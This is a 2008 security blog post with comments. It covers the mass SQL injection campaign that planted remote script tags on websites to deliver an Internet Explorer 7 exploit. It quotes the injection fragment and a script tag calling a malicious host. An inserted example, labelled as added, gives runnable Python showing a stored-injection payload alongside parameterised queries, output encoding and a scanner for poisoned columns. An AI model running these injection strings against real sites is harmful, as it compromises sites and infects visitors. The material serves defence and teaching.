SQL Injection Tangos with Heap Overflows

And the results are not graceful.

Unless you have been living under a rock, you have heard about the latest unpatched Internet Explorer 7 vulnerability. If you browse a web site that has been modified to contain malicious JavaScript, it will download malware to your Windows machine. I first caught wind of it over the weekend when a friend said he was browsing a legitimate training web site when suddenly he saw his Internet Explorer status line change to, “Databinding…”. That will make your pulse quicken. AV was useless in stopping the attack.

Attackers have been finding web sites with vulnerabilities that allow them to modify the site's content. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field (this is a fragment of a longer cursor-driven statement that appends the script tag to the data in each column the cursor visits):

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM

They then hope that the data will get read back out of the SQL database at some point and that the web app will send the following JavaScript to a browser, unencoded:

<script src=http://17gamo [dot] com/1.js></script>

The victim's browser then pulls the malicious JavaScript, which triggers the IE vulnerability, and the browser gets owned. Internet Storm Center has another nice example where the JavaScript is injected as a cookie value.
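The chain above, reduced to something you can run, as an added example that is not part of the original post: a string-built UPDATE that an attacker can break out of, the SQLite spelling of the rtrim(convert(...))+'<script ...>' trick that appends the script tag to every row, the raw rendering that turns the stored tag into live script, and the two controls that break the chain (a parameterised query on the way in, HTML encoding on the way out). It also includes the check a site owner would want after the fact: a walk over every text column looking for rows that already carry a script tag, the same sysobjects/syscolumns walk the worm uses, turned defensive. The posts table, its rows, the function names and the use of SQLite's executescript() to stand in for SQL Server's stacked statements are all assumptions of this example.

```python
import html
import sqlite3

# Constructed stand-in for the attack the post describes. Example code, not the
# post's own; the table, rows and function names are assumptions.

PAYLOAD = "<script src=http://17gamo [dot] com/1.js></script>"

# What the attacker types into a single form field. The leading quote closes the
# application's string literal, the second statement rewrites every row's body
# (SQLite's spelling of rtrim(convert(...))+'<script ...>'), and the trailing
# comment swallows the remainder of the application's own query.
ATTACK_INPUT = f"x'; UPDATE posts SET body = rtrim(body) || '{PAYLOAD}'; --"


def setup_db():
    """In-memory database with a text column an attacker wants to poison (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO posts (title, body) VALUES ('Welcome', 'Hello world ')")
    conn.execute("INSERT INTO posts (title, body) VALUES ('Training', 'Lesson one ')")
    conn.commit()
    return conn


def update_title_vulnerable(conn, post_id, new_title):
    """String-built SQL. executescript() permits stacked statements, as SQL Server does."""
    conn.executescript(
        f"UPDATE posts SET title = '{new_title}' WHERE id = {int(post_id)};"
    )


def update_title_safe(conn, post_id, new_title):
    """Parameterised query: the payload is stored as an inert string, nothing executes."""
    conn.execute("UPDATE posts SET title = ? WHERE id = ?", (new_title, post_id))
    conn.commit()


def render_vulnerable(conn):
    """Echoes stored data raw: a poisoned row becomes live script in the browser."""
    rows = conn.execute("SELECT title, body FROM posts ORDER BY id").fetchall()
    return "".join(f"<h2>{t}</h2><p>{b}</p>" for t, b in rows)


def render_safe(conn):
    """Output encoding: data already poisoned through SQLi is still shown as text."""
    rows = conn.execute("SELECT title, body FROM posts ORDER BY id").fetchall()
    return "".join(f"<h2>{html.escape(t)}</h2><p>{html.escape(b)}</p>" for t, b in rows)


def find_poisoned_columns(conn, marker="<script src="):
    """Walk every text column of every table and return (table, column, hit_count)
    for columns whose data already contains a script tag. Run this against a site
    you suspect was hit; SQLite's sqlite_master/PRAGMA replace sysobjects/syscolumns."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for col in conn.execute(f'PRAGMA table_info("{table}")'):
            name, ctype = col[1], (col[2] or "").upper()
            if "CHAR" not in ctype and "TEXT" not in ctype:
                continue
            n = conn.execute(
                f'SELECT count(*) FROM "{table}" WHERE instr("{name}", ?) > 0',
                (marker,)).fetchone()[0]
            if n:
                hits.append((table, name, n))
    return hits


def demo():
    """Run the chain both ways and report what each step produced."""
    vuln = setup_db()
    update_title_vulnerable(vuln, 1, ATTACK_INPUT)
    safe = setup_db()
    update_title_safe(safe, 1, ATTACK_INPUT)
    return {
        # Both rows' bodies now carry the tag: the mass rewrite succeeded.
        "poisoned": find_poisoned_columns(vuln),
        "poisoned_html_live": PAYLOAD in render_vulnerable(vuln),
        "encoded_html_live": PAYLOAD in render_safe(vuln),
        # Parameterisation stopped the rewrite, but the attacker's own field still
        # holds the literal tag; without output encoding that row is a stored XSS.
        "safe_poisoned": find_poisoned_columns(safe),
        "safe_body": safe.execute("SELECT body FROM posts WHERE id = 1").fetchone()[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note the safe_poisoned result: a parameterised query stops the injected statement from running, but the attacker's text is still stored verbatim, so the scanner flags it. Only the encoding step in render_safe keeps it from executing in a visitor's browser, which is why both controls are needed.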

It Takes Two to Tango

This is an example of a vulnerability where it takes two to tango. It requires not only a vulnerable client program that consumes untrusted data from the internet, but also, to spread widely, vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is there is no “safe” area of the internet to browse.

Something that concerns me is that the organizations with the vulnerable web applications don't know it or don't care. They don't face the brand damage of a large software company such as Microsoft, so thousands of small vulnerable web apps keep serving up the latest and greatest malicious payloads for the latest client vulnerabilities. If it isn't Internet Explorer, like this week, it might be Firefox or Flash or a media plug-in.

Insecure web applications are helping the criminals win.

3 Comments »

Great post. There is a third in the tango: cross-site scripting. This is a heap overflow attack, made using a stored cross-site scripting attack made with SQL injection. Yak!

Comment by Miguel Correia — December 17, 2008 @ 1:29 pm

@Miguel

Agreed. Perhaps I should change the title to “IE has a three way with SQL Injection and XSS”.

-Chris

Comment by Chris Wysopal — December 17, 2008 @ 7:26 pm

[...] SQL Injection Tangos with Heap Overflows Multifactor vulnerabilities lead to massive exploits. The scary bit about this is that this points out that the 500,000 or so IIS servers that got hit with SQL injection attacks are, if they remain unpatched, fertile ground for exploiting just about any other vulnerability that comes around. (tags: security sqlinjection) [...]

Pingback by links for 2008-12-17 (Jarrett House North) — December 17, 2008 @ 9:01 pm
